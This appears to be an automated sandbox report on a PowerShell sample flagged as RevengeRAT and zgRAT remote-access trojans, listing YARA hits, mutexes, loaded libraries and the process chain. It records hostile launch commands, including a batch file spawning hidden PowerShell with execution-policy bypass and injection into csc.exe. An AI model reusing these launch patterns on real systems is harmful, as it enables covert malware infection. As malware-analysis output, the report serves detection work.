                    Source: Yara matchFile source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT and variants payload Author: ditekSHen
                    Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8890D30_2_00007FFD9B8890D3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_05767C502_2_05767C50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_057674A82_2_057674A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_057666782_2_05766678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_057661282_2_05766128
                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
                    Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.evad.winPS1@20/13@2/3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\pHXJvbCGPPiC
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3iqdlbf.ikw.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: stage2.ps1Virustotal: Detection: 12%
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
